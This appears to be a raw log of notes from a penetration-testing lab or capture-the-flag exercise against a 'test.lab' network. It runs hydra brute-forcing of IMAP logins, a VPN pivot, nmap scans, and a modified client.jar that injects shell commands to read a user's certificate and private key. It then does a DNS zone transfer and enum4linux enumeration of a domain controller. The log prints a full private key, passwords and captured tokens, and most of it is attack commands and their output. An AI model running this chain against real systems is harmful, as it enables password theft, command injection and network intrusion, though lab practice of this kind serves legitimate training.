-
Crack password for mail
# cat logins_mail.txt
sidorov@test.lab
ivanov@test.lab
petrov@test.lab
support@test.lab
hydra -L logins_mail.txt -P /tmp/1 imap://192.168.101.14 -t 60 -f -I
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/
[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.
[143][imap] host: 192.168.101.14 login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12
telnet 192.168.101.14 imap
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.
root@kali ~/ctf/pentestitlab14 unzip vpn.zip -d vpn
Archive: vpn.zip
extracting: vpn/user
inflating: vpn/vpn.conf
root@kali ~/ctf/pentestitlab14 cd vpn
root@kali ~/ctf/pentestitlab14/vpn ls
user vpn.conf
root@kali ~/ctf/pentestitlab14/vpn
-
Connect to new VPN
root@kali ~/ctf/pentestitlab14/vpn openvpn --config vpn.conf
Wed Feb 12 18:18:42 2020 WARNING: file 'user' is group or others accessible
Wed Feb 12 18:18:42 2020 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Feb 20 2019
Wed Feb 12 18:18:42 2020 library versions: OpenSSL 1.1.1d 10 Sep 2019, LZO 2.10
Wed Feb 12 18:18:42 2020 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.
Wed Feb 12 18:18:42 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Wed Feb 12 18:18:42 2020 UDP link local (bound): [AF_INET][undef]:1194
Wed Feb 12 18:18:42 2020 UDP link remote: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 TLS: Initial packet from [AF_INET]192.168.101.15:1194, sid=6b57de4a c850dc54
Wed Feb 12 18:18:42 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=1, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=0, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=server, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Wed Feb 12 18:18:42 2020 [server] Peer Connection Initiated with [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:43 2020 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Wed Feb 12 18:18:43 2020 PUSH: Received control message: 'PUSH_REPLY,route 172.16.0.0 255.255.0.0,route 10.11.0.1,topology net30,ifconfig 10.11.0.42 10.11.0.41,peer-id 9,cipher AES-256-GCM'
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: --ifconfig/up options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: route options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: peer-id set
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: data channel crypto options modified
Wed Feb 12 18:18:43 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Wed Feb 12 18:18:43 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 ROUTE_GATEWAY 192.168.51.1/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:a0:58:f0
Wed Feb 12 18:18:43 2020 TUN/TAP device tun1 opened
Wed Feb 12 18:18:43 2020 TUN/TAP TX queue length set to 100
Wed Feb 12 18:18:43 2020 /sbin/ip link set dev tun1 up mtu 1500
Wed Feb 12 18:18:43 2020 /sbin/ip addr add dev tun1 local 10.11.0.42 peer 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.41
Wed Feb 12 18:18:44 2020 Initialization Sequence Completed
We have new subnet - 172.16.0.0/16
-
Scan 172.16.0.0/16 (masscan, nmap)
nmap -T5 -n -sn 172.16.0.0/24 ✔ ⚡ 3457 21:21:05
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-13 09:32 CET
Nmap scan report for 172.16.0.11
Host is up (0.071s latency).
Nmap done: 256 IP addresses (1 host up) scanned in 34.57 seconds
Nmap scan report for 172.16.0.20
Host is up (0.052s latency).
Not shown: 850 filtered ports, 139 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
1024/tcp open kdm
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap scan report for 172.16.0.10
Host is up (0.052s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
53/tcp open domain
-
client.jar
root@kali ~/ctf/pentestitlab14 java -jar client.jar
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
/dev/sda1 15G 2.0G 13G 14% /
root@kali ~/ctf/pentestitlab14
-
edit client.jar
jar -xf client.jar
oot@kali ~/ctf/pentestitlab14/client-jar cd .. ✔ ⚡ 3397 20:23:21
root@kali ~/ctf/pentestitlab14 cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r ✔ ⚡ 3398 20:24:04
root@kali ~/ctf/pentestitlab14 cd - ✔ ⚡ 3399 20:24:07
~/ctf/pentestitlab14/client-jar
root@kali ~/ctf/pentestitlab14/client-jar jar uf client.jar lab/test/client/Main.class ✔ ⚡ 3400 20:24:13
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
root@kali ~/ctf/pentestitlab14/client-jar java -jar client.jar ✔ ⚡ 3401 20:24:21
one liner:
root@kali ~/ctf/pentestitlab14/client-jar cd .. && cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r && cd client-jar && jar uf client.jar lab/test/client/Main.class && java -jar client.jar
ldc "ls -al /home/dev/.crt;cat /home/dev/.crt/dev.crt;echo -e "\n\n\n\n"; cat /home/dev/.crt/dev.key;"
drwxr-xr-x 2 root root 4096 Nov 14 18:44 .
drwxr-xr-x 3 dev dev 4096 Nov 14 18:42 ..
-rw-r--r-- 1 root root 5358 Nov 14 18:43 dev.crt
-rw-r--r-- 1 root root 1705 Nov 14 18:43 dev.key
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 3 (0x3)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA/name=EasyRSA/emailAddress=support@test.lab
Validity
Not Before: Nov 14 07:50:50 2019 GMT
Not After : Nov 11 07:50:50 2029 GMT
Subject: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=dev/name=EasyRSA/emailAddress=support@test.lab
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ae:dc:b6:2b:c2:31:3e:e6:e7:de:88:e7:c6:a2:
1b:d2:9a:a1:8f:dd:8d:07:03:ad:24:f9:85:d0:dd:
5b:de:96:2f:95:66:b3:cc:25:b5:c6:f1:7f:ec:66:
d8:c7:84:e2:f0:db:6e:4a:8f:ee:b7:f2:c2:6e:cf:
f6:13:eb:a9:ba:2c:58:a3:1e:1f:ab:6b:4a:ec:39:
be:be:b8:3c:67:b2:24:cd:7a:49:fd:00:59:f5:9d:
b8:14:cc:e7:47:ae:ce:03:18:92:21:1d:6f:31:04:
aa:9e:aa:7e:76:99:b4:40:53:33:9f:67:f2:66:7f:
e7:f9:22:2f:c7:3b:8e:3a:08:0c:d7:7b:39:20:e0:
33:38:65:20:91:4c:2b:eb:b3:d4:9b:dd:06:05:90:
ae:47:6b:91:55:2b:9e:06:58:de:62:68:92:d8:94:
2c:f7:61:a1:f6:22:c9:4a:7c:dd:06:bf:fb:0d:b3:
1d:2d:1c:a4:ea:8e:70:28:bd:be:d3:43:23:6f:ba:
dc:94:db:da:82:52:58:fb:36:45:06:c2:c4:37:c5:
e6:c8:73:a5:3d:2f:a6:11:d4:d6:19:29:65:99:8b:
5b:87:e1:51:b0:f6:12:8a:d0:02:84:45:13:85:69:
22:ed:07:44:3c:a7:6b:91:32:a2:4f:2b:9e:79:83:
46:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
Easy-RSA Generated Certificate
X509v3 Subject Key Identifier:
51:51:D9:D1:8E:E2:36:87:DE:62:E3:98:68:7D:68:DB:E3:AB:35:87
X509v3 Authority Key Identifier:
keyid:61:14:9C:EE:28:7B:A5:2D:69:B6:AB:34:C9:9B:87:73:07:49:20:69
DirName:/C=RU/ST=Moscow/L=Moscow/O=test/OU=test/CN=test CA/name=EasyRSA/emailAddress=support@test.lab
serial:F5:C2:6A:50:05:37:8F:F8
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Key Usage:
Digital Signature
X509v3 Subject Alternative Name:
DNS:dev
Signature Algorithm: sha256WithRSAEncryption
86:02:4e:d1:25:78:1f:a9:8a:f9:c9:52:7c:4b:92:e4:59:bf:
33:37:86:54:cc:0a:54:a5:5b:8c:70:ba:9d:92:12:24:f8:aa:
80:7a:f0:4b:9a:c1:d1:93:95:c9:72:04:96:d3:8e:30:3d:26:
53:d8:12:e7:31:9a:71:a1:29:31:8b:83:21:fa:fe:e9:93:9b:
af:6c:e4:6f:93:03:ba:a2:8b:53:0f:4d:d9:3b:af:c1:75:36:
3f:3f:1f:28:28:9f:36:37:a3:f2:b8:d7:89:bd:f5:6d:f8:cf:
7a:ac:2f:88:22:6e:9e:00:30:14:db:c6:2f:1b:54:bd:5e:9a:
f5:46:7e:ca:e3:2e:54:f8:29:fd:67:38:9b:14:30:c6:e3:b6:
de:6d:a4:5d:51:84:ec:48:19:7e:40:1f:56:4e:46:52:10:23:
17:57:1c:f0:ce:96:70:9a:f8:e7:7b:51:00:d4:98:ce:09:16:
d7:4b:72:7f:38:aa:ae:42:10:4b:4f:c3:f9:bc:8a:92:03:42:
7b:1f:7c:8c:5e:3c:78:9a:f7:4c:f6:67:47:74:fb:8c:6f:75:
31:8e:e5:43:14:7f:50:9e:c0:4f:fe:d4:ef:d0:44:3c:e5:f2:
f5:46:e8:e9:da:92:b9:f2:d2:42:97:7c:05:b2:22:5d:0b:3b:
71:3d:d0:a0
-----BEGIN CERTIFICATE-----
MIIE+DCCA+CgAwIBAgIBAzANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCUlUx
DzANBgNVBAgTBk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0
MQ0wCwYDVQQLEwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5
UlNBMR8wHQYJKoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiMB4XDTE5MTExNDA3
NTA1MFoXDTI5MTExMTA3NTA1MFowgY4xCzAJBgNVBAYTAlJVMQ8wDQYDVQQIEwZN
b3Njb3cxDzANBgNVBAcTBk1vc2NvdzENMAsGA1UEChMEdGVzdDENMAsGA1UECxME
dGVzdDEMMAoGA1UEAxMDZGV2MRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJKoZIhvcN
AQkBFhBzdXBwb3J0QHRlc3QubGFiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEArty2K8IxPubn3ojnxqIb0pqhj92NBwOtJPmF0N1b3pYvlWazzCW1xvF/
7GbYx4Ti8NtuSo/ut/LCbs/2E+upuixYox4fq2tK7Dm+vrg8Z7IkzXpJ/QBZ9Z24
FMznR67OAxiSIR1vMQSqnqp+dpm0QFMzn2fyZn/n+SIvxzuOOggM13s5IOAzOGUg
kUwr67PUm90GBZCuR2uRVSueBljeYmiS2JQs92Gh9iLJSnzdBr/7DbMdLRyk6o5w
KL2+00Mjb7rclNvaglJY+zZFBsLEN8XmyHOlPS+mEdTWGSllmYtbh+FRsPYSitAC
hEUThWki7QdEPKdrkTKiTyueeYNGswIDAQABo4IBWTCCAVUwCQYDVR0TBAIwADAt
BglghkgBhvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0G
A1UdDgQWBBRRUdnRjuI2h95i45hofWjb46s1hzCBxwYDVR0jBIG/MIG8gBRhFJzu
KHulLWm2qzTJm4dzB0kgaaGBmKSBlTCBkjELMAkGA1UEBhMCUlUxDzANBgNVBAgT
Bk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0MQ0wCwYDVQQL
EwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJ
KoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiggkA9cJqUAU3j/gwEwYDVR0lBAww
CgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA4GA1UdEQQHMAWCA2RldjANBgkqhkiG
9w0BAQsFAAOCAQEAhgJO0SV4H6mK+clSfEuS5Fm/MzeGVMwKVKVbjHC6nZISJPiq
gHrwS5rB0ZOVyXIEltOOMD0mU9gS5zGacaEpMYuDIfr+6ZObr2zkb5MDuqKLUw9N
2TuvwXU2Pz8fKCifNjej8rjXib31bfjPeqwviCJungAwFNvGLxtUvV6a9UZ+yuMu
VPgp/Wc4mxQwxuO23m2kXVGE7EgZfkAfVk5GUhAjF1cc8M6WcJr453tRANSYzgkW
10tyfziqrkIQS0/D+byKkgNCex98jF48eJr3TPZnR3T7jG91MY7lQxR/UJ7AT/7U
79BEPOXy9Ubo6dqSufLSQpd8BbIiXQs7cT3QoA==
-----END CERTIFICATE-----
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCu3LYrwjE+5ufe
iOfGohvSmqGP3Y0HA60k+YXQ3Vveli+VZrPMJbXG8X/sZtjHhOLw225Kj+638sJu
z/YT66m6LFijHh+ra0rsOb6+uDxnsiTNekn9AFn1nbgUzOdHrs4DGJIhHW8xBKqe
qn52mbRAUzOfZ/Jmf+f5Ii/HO446CAzXezkg4DM4ZSCRTCvrs9Sb3QYFkK5Ha5FV
K54GWN5iaJLYlCz3YaH2IslKfN0Gv/sNsx0tHKTqjnAovb7TQyNvutyU29qCUlj7
NkUGwsQ3xebIc6U9L6YR1NYZKWWZi1uH4VGw9hKK0AKERROFaSLtB0Q8p2uRMqJP
K555g0azAgMBAAECggEAV6ofSmDY/4gTxuUsDdFH0ZXkWZPhGBsnutm91LClVjpF
MMmEalydfVeloocNNznP7KCV8pumOmJiR9vKqsIDHWsOJPj9N5tavINWtZb38aTF
/p3Iaia68wBXQVZYvP9OGQ9Ac4mmLRUB1Pn03NDCJV2RC+G5DNojGiuheGjLLRv3
2e9inBCF4PSktL4E9u7/2hr5xba2z0aVt47vkxe6Q+InfAHzaGO5S4wao4T4RXZp
CKgITg+9/VBQrHHaKqqwM9l/XZA68svNvD3P00krI9Jn6kriQPK0NKx/n/KyVixV
uG6ij5+tWrvHNihofGR7LoJ8wWMenO0QoMjgoNblQQKBgQDZkIS9udncO2HIB5/n
y2JIB89Ep6PtD1iYLhHInCpuIrYWvktk36GVLCe2TG2/6bqmJyFzM5uv0cnwbCHx
PYFods1/mA80K5p7n4lhviqgeogbC/PbIA4RGYW5JxTDk82LcIs4qg5n27lW+nY6
F7RkOVObXoIvZ5iitHTRjTo4pwKBgQDNwPQj7ER4Yxge7oF+HorXnkEWUiPiRV8K
3qJZS3T1DSxhkDTW+NcJnZ7GE7EGN+V9zFGUHFjoh0vmrFHzIub7n2eClNTvnkko
Z/1T2QLdg4pfnW+MMAqqas78b4m88X5j6C3OvXWvFzzNbqJKxi38M3CAgiS8gUZd
/h9yJ0F3FQKBgQC3lytciqNcI8P8rupyCH9z9xshfTFoTwXczSt2lMl9TM9JW+V1
Rv0sSylrvQzz4ID/yo+AjjE3aZm1xxnRX6x/AZmhrShPRuhCn7qnf3irGRsXb7uk
0mTsaxQbzO3JqETQAPWKqH4liBXbXtk7Zlt0I6f4uQS0igAUdKELX9iciwKBgGyT
nkI2tAszf88S3ZLIW0xdXsuAnR8SrIz334RvpVCLmxgBGWE3/4I7g0XTrl8xsBEq
eQJH00Mh4pPf6376tBmkjOMD1zp7tO91sOFGa5SpjaPXWL4JvBciNghQc8cZSTE/
nKy0nh2/jX57G3mKC0pDeuLVyr0PGysOp1l+DbXhAoGBANNm56+tofNITKiXCdTH
/ZSEuabW2mFxAs2U8HUlwgxv3fc4Uy8JuS+JBpOZ1vuAKLJbkZJiEgk/xTQa3J8i
OfpPfY0tkSzlVe8VWSvvFlS2LoeUBtsdtHlecTTUkFStbmQbYrKX7ATl1xZlcNey
i70HDndxU49PRN/6rMuSTzMK
-----END PRIVATE KEY-----
root@kali ~/ctf/pentestitlab14/client-jar vim dev.crt.172.16.20.2 SIGINT(2) ↵ ⚡ 3447 21:01:00
root@kali ~/ctf/pentestitlab14/client-jar vim dev.key.172.16.20.2 ✔ ⚡ 3450 21:01:51
root@kali ~/ctf/pentestitlab14/client-jar chmod 600 dev.key.172.16.20.2 ✔ ⚡ 3451 21:02:08
root@kali ~/ctf/pentestitlab14/client-jar
cat /opt/token
L0* Dws7m|b;ek
-
172.16.0.11
root@kali ~/ctf/pentestitlab14 curl http://172.16.0.11/token
#trfioefjio
root@kali ~/ctf/pentestitlab14
-
DNS
root@kali ~/ctf/pentestitlab14/client-jar dig axfr @172.16.0.20 test.lab. ✔ ⚡ 3515 15:07:15
; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.20 test.lab.
; (1 server found)
;; global options: +cmd
test.lab.
3600
IN
SOA
ad1.test.lab. hostmaster.test.lab. 1 900 600 86400 3600
; Transfer failed.
root@kali ~/ctf/pentestitlab14/client-jar dig axfr @172.16.0.10 test.lab. ✔ ⚡ 3516 15:07:17
; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.
; (1 server found)
;; global options: +cmd
test.lab.
21600
IN
SOA
test.lab. ns1.test.lab. 117 5 30 21600 60
test.lab.
21600
IN
NS
ns1.test.lab.
test.lab.
21600
IN
NS
ns2.test.lab.
test.lab.
21600
IN
A
172.16.0.20
test.lab.
21600
IN
A
172.16.50.20
_kerberos._tcp.dc._msdcs.test.lab. 21600 IN SRV
0 0 88 test.lab.
_ldap._tcp.dc._msdcs.test.lab. 21600 IN
SRV
0 0 389 test.lab.
gc._msdcs.test.lab.
21600
IN
A
172.16.50.20
_ldap._tcp.gc._msdcs.test.lab. 21600 IN
SRV
0 0 3268 test.lab.
_kerberos._tcp.test.lab. 21600
IN
SRV
0 0 88 test.lab.
_kpasswd._tcp.test.lab.
21600
IN
SRV
0 0 464 test.lab.
_ldap._tcp.test.lab.
21600
IN
SRV
0 0 389 test.lab.
_kerberos._udp.test.lab. 21600
IN
SRV
0 0 88 test.lab.
_kpasswd._udp.test.lab.
21600
IN
SRV
0 0 464 test.lab.
admin.test.lab.
21600
IN
A
172.16.40.3
dc.test.lab.
21600
IN
A
172.16.50.20
dc1.test.lab.
21600
IN
A
172.16.50.20
dc2.test.lab.
21600
IN
A
172.16.0.20
dns.test.lab.
21600
IN
A
172.16.0.10
dns.test.lab.
21600
IN
A
172.16.50.10
elastic.test.lab.
21600
IN
A
172.16.40.6
_ldap._tcp.ForestDnsZones.test.lab. 21600 IN SRV 0 0 389 test.lab.
git.test.lab.
21600
IN
A
172.16.0.21
mail.test.lab.
21600
IN
A
172.16.50.3
news.test.lab.
21600
IN
A
172.16.50.21
ns1.test.lab.
21600
IN
A
172.16.50.10
ns2.test.lab.
21600
IN
A
172.16.0.10
site.test.lab.
21600
IN
A
172.16.50.2
token-SDS34gs93.test.lab. 21600
IN
A
127.0.0.1 new token :) (ns)
vpn-1.test.lab.
21600
IN
A
172.16.50.11
vpn-2.test.lab.
21600
IN
A
172.16.0.11
test.lab.
21600
IN
SOA
test.lab. ns1.test.lab. 117 5 30 21600 60
-
DC2
root@kali ~/ctf/pentestitlab14 enum4linux 172.16.0.20 -u 'DC2\dev' -p 'L1(#@ru0euh0if' 1 ↵ ⚡ 3600 16:25:46
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 13 16:26:10 2020
==========================
| Target Information |
==========================
Target ........... 172.16.0.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 172.16.0.20 |
===================================================
[+] Got domain/workgroup name: TEST
===========================================
| Nbtstat Information for 172.16.0.20 |
===========================================
Looking up status of 172.16.0.20
DC2 <00> - M <ACTIVE> Workstation Service
DC2 <03> - M <ACTIVE> Messenger Service
DC2 <20> - M <ACTIVE> File Server Service
TEST <1c> - <GROUP> M <ACTIVE> Domain Controllers
TEST <00> - <GROUP> M <ACTIVE> Domain/Workgroup Name
__SAMBA__ <00> - <GROUP> M <ACTIVE> <PERMANENT> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
====================================
| Session Check on 172.16.0.20 |
====================================
[+] Server 172.16.0.20 allows sessions using username '', password ''
==========================================
| Getting domain SID for 172.16.0.20 |
==========================================
Domain Name: TEST
Domain Sid: S-1-5-21-518050695-217262318-2335301019
[+] Host is part of a domain (not a workgroup)
=====================================
| OS information on 172.16.0.20 |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 172.16.0.20 from smbclient:
[+] Got OS info for 172.16.0.20 from srvinfo:
DC2 Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
platform_id :
500
os version :
6.1
server type :
0x809a03
============================
| Users on 172.16.0.20 |
============================
index: 0x1 RID: 0x44f acb: 0x00000010 Account: sidorov
Name: Maksim Sidorov
Desc:
index: 0x2 RID: 0x1f4 acb: 0x00000010 Account: Administrator
Name:
Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x450 acb: 0x00000010 Account: ivanov
Name: Ego Ivanov
Desc:
index: 0x4 RID: 0x458 acb: 0x00000010 Account: leonov
Name: Leonov
Desc:
index: 0x5 RID: 0x457 acb: 0x00000010 Account: petrov
Name: Petrov
Desc:
index: 0x6 RID: 0x1f6 acb: 0x00000011 Account: krbtgt
Name:
Desc: Key Distribution Center Service Account
index: 0x7 RID: 0x1f5 acb: 0x00000215 Account: Guest
Name:
Desc: Built-in account for guest access to the computer/domain
index: 0x8 RID: 0x452 acb: 0x00000010 Account: token_OWdjwifiw0
Name: Token
Desc:
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sidorov] rid:[0x44f]
user:[ivanov] rid:[0x450]
user:[token_OWdjwifiw0] rid:[0x452]
user:[petrov] rid:[0x457]
user:[leonov] rid:[0x458]
========================================
| Share Enumeration on 172.16.0.20 |
========================================
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 172.16.0.20
//172.16.0.20/netlogon
Mapping: DENIED, Listing: N/A
//172.16.0.20/sysvol
Mapping: DENIED, Listing: N/A
//172.16.0.20/IPC$
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
===================================================
| Password Policy Information for 172.16.0.20 |
===================================================
[+] Attaching to 172.16.0.20 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] TEST
[+] BUILTIN
[+] Password Info for Domain: TEST
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 268 days 23 hours 59 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 268 days 2 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=============================
| Groups on 172.16.0.20 |
=============================
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Account Operators] rid:[0x224]
group:[Server Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
[+] Getting builtin group memberships:
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Read-Only Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Enterprise Admins
[+] Getting domain groups:
group:[Enterprise Read-Only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-Only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group 'Group Policy Creator Owners' (RID: 520) has member: TEST\Administrator
Group 'Schema Admins' (RID: 518) has member: TEST\Administrator
Group 'Domain Admins' (RID: 512) has member: TEST\Administrator
Group 'Enterprise Admins' (RID: 519) has member: TEST\Administrator
======================================================================
| Users on 172.16.0.20 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-5-21-518050695-217262318-2335301019
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-518050695-217262318-2335301019 and logon username '', password ''
S-1-5-21-518050695-217262318-2335301019-500 TEST\Administrator (Local User)
S-1-5-21-518050695-217262318-2335301019-501 TEST\Guest (Local User)
S-1-5-21-518050695-217262318-2335301019-502 TEST\krbtgt (Local User)
S-1-5-21-518050695-217262318-2335301019-503 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-504 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-505 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-506 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-507 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-508 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-509 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-510 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-511 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-512 TEST\Domain Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-513 TEST\Domain Users (Domain Group)
S-1-5-21-518050695-217262318-2335301019-514 TEST\Domain Guests (Domain Group)
S-1-5-21-518050695-217262318-2335301019-515 TEST\Domain Computers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-516 TEST\Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-517 TEST\Cert Publishers (Local Group)
S-1-5-21-518050695-217262318-2335301019-518 TEST\Schema Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-519 TEST\Enterprise Admins (Domain Group)
